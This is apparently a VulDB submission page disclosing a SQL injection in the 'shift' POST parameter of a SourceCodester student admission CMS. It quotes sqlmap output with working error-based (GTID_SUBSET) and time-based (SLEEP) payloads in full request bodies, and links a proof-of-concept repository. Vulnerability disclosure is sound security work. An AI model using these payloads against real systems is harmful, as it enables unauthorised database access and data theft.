Enviar #42807: Student-Admission CMS Shift parameter Sqlinjectioninformación

Título	Student-Admission CMS Shift parameter Sqlinjection
Descripción	The commit page did not check the shift parameter resulting in Sql injection. The Shift parameter is not checked resulting in Sql injection Direct attack using Sqlmap Sqlmap Attack ··· POST parameter 'shift' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 1581 HTTP(s) requests: --- Parameter: shift (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: sname=bbb&gname=aaa&contact=1&[email protected]&address=111111&class=1&shift=1 AND GTID_SUBSET(CONCAT(0x717a766b71,(SELECT (ELT(3656=3656,1))),0x7162766a71),3656)&gender=female&blgroup=abc&division=1&submit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sname=bbb&gname=aaa&contact=1&[email protected]&address=111111&class=1&shift=1 AND (SELECT 2934 FROM (SELECT(SLEEP(5)))GVhT)&gender=female&blgroup=abc&division=1&submit=Submit --- [09:45:36] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.6.9 back-end DBMS: MySQL >= 5.6 ··· Url：https://github.com/badboycxcc/Student-Admission-Sqlinjection Code Download：https://www.sourcecodester.com/php/15514/online-admission-system-php-and-mysql.html
Fuente	⚠️ https://github.com/badboycxcc/Student-Admission-Sqlinjection
Usuario	cxaqhq (UID 23728)
Sumisión	2022-08-04 05:20 (hace 4 años)
Moderación	2022-08-04 07:22 (2 hours later)
Estado	Aceptado
Entrada de VulDB	205564 [SourceCodester Online Admission System POST Parameter shift inyección SQL]
Puntos	20

◂ Anterior Visión De Conjunto Próximo ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!